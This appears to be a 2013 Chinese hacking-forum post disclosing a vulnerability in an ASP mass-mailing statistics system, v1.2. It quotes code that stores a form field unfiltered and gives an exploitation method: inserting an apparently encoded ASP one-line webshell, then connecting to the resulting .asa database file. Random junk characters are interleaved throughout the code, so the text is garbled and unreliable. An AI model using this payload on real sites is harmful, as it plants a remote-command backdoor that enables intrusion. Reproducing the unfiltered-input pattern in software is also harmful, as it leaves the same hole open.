中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp 3 N( k! }8 I7 \# I+ L! s& \
6 l+ H/ l+ O4 l! s. Y" O2 }
IF Request.QueryString("Action")="del" Then
; F- U% v* Z! ]5 p, C8 mID=Request.QueryString("ID")
  P: l' V* A+ j* t& @/ U8 l( x" m9 ]IF Countss ("tui","Fenlei",ID )<>0 then 3 g: ~+ E  }- i+ ~
'略
, W, M5 V* v- @IF Request.QueryString("Action")="Add" Then ( w! V8 @0 ~& K7 ~% y. i2 V5 C2 j
Tname=Request.Form("Typename") 4 W+ O& k( r# M! w  Z* K8 j3 s
Set Rs=Server.CreateObject("adodb.Recordset") ) N; T# g, [- Y' L* F) ]
Sql="Select * From Fenlei Order by id Desc " 3 p: x: |; n" i( D
Rs.Open Sql,Conn,1,3 $ A( ~, f2 v: z' c$ ]
Rs.Addnew
* z* p+ U  A) e, ~8 vRs("Typename")=Tname " R: z2 u; G9 j7 n, \' P7 F
'略
4 u! ~" B; D& ^& w! LSet Rs=Server.CreateObject("adodb.Recordset")
4 b0 ^8 |( d* K, ~Sql="Select * From Fenlei Order by id Desc " 3 V. U0 U9 `6 m& r7 g+ g# \1 Q
Rs.Open Sql,Conn,1,1 2 ?0 f! g6 f) v! d3 {3 o
'略 6 E$ ?( \( \  z
%>- T2 X8 r, G& e

3 Z2 }% U2 N5 J" w, G 0 e! T9 n9 m8 `+ o* }" D
- t! X& D: e; X/ }. r- }* Z
没有过滤,直接写入数据库。0 z+ T$ L6 ?8 Y& q4 q; L

1 R4 p! R* r# v% ^/ U利用方法:$ X3 |/ N8 D2 s
9 r8 W6 u' F# w/ Y+ {  ]% h# x2 s! ^
插入:┼攠數畣整爠煥敵瑳∨≡┩>
, E3 c" P8 v7 y- l6 g6 ? 9 k& _: Q: ?( n& P" }8 Q

+ c8 A8 u" e0 S$ M连接: http://www.xxx.com/###tongbaner.asa , Z# N9 k$ V7 z4 Y& O# h2 t9 j$ |
'默认安装文件: 0 A# H6 O. k# E' I
'install.asp
8 X3 s# Y0 A+ y$ C& C



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2